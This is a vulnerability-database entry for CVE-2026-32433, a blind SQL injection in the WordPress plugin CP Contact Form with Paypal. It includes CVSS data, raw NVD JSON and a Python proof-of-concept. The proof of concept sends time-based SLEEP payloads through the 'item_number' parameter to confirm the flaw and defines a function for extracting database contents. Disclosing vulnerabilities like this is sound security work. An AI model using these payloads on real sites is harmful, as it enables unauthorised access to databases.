Security Vulnerability Report
中文
CVE-2026-32433 CVSS 8.5 HIGH

CVE-2026-32433

Published: 2026-03-13 19:55:03
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in codepeople CP Contact Form with Paypal cp-contact-form-with-paypal allows Blind SQL Injection.This issue affects CP Contact Form with Paypal: from n/a through <= 1.3.61.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

CP Contact Form with Paypal <= 1.3.61

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32433 Blind SQL Injection PoC # Target: WordPress CP Contact Form with Paypal Plugin <= 1.3.61 # Type: Time-based Blind SQL Injection import requests import time import sys target_url = input("Enter target URL (e.g., http://target.com): ") def test_blind_sql_injection(url): """Test for blind SQL injection vulnerability""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Payload to test sleep-based injection # This payload exploits the vulnerability in form processing payload_true = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1" payload_false = "1' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END) AND '1'='1" print("[*] Testing Blind SQL Injection...") print(f"[*] Target: {url}") # Test true condition start_time = time.time() try: response = requests.get(url, params={'item_number': payload_true}, headers=headers, timeout=10) true_time = time.time() - start_time except requests.exceptions.Timeout: true_time = 10 # Test false condition start_time = time.time() try: response = requests.get(url, params={'item_number': payload_false}, headers=headers, timeout=10) false_time = time.time() - start_time except requests.exceptions.Timeout: false_time = 10 print(f"[+] True condition response time: {true_time:.2f}s") print(f"[+] False condition response time: {false_time:.2f}s") if true_time > false_time + 3: print("[!] VULNERABLE: Blind SQL Injection detected!") return True else: print("[-] Not vulnerable or target not reachable") return False def extract_data(url, sql_query): """Extract data using time-based blind SQL injection""" # Example: Extract database version payload = f"1' AND (SELECT CASE WHEN ({sql_query}) THEN SLEEP(3) ELSE 0 END) AND '1'='1" start_time = time.time() try: response = requests.get(url, params={'item_number': payload}, timeout=10) elapsed = time.time() - start_time except: elapsed = 10 return elapsed > 3 if __name__ == "__main__": test_blind_sql_injection(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32433", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:02.873", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in codepeople CP Contact Form with Paypal cp-contact-form-with-paypal allows Blind SQL Injection.This issue affects CP Contact Form with Paypal: from n/a through <= 1.3.61."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') vulnerabilidad en codepeople CP Contact Form with Paypal cp-contact-form-with-paypal permite Inyección SQL Ciega. Este problema afecta a CP Contact Form with Paypal: desde n/a hasta &lt;= 1.3.61."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cp-contact-form-with-paypal/vulnerability/wordpress-cp-contact-form-with-paypal-plugin-1-3-61-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}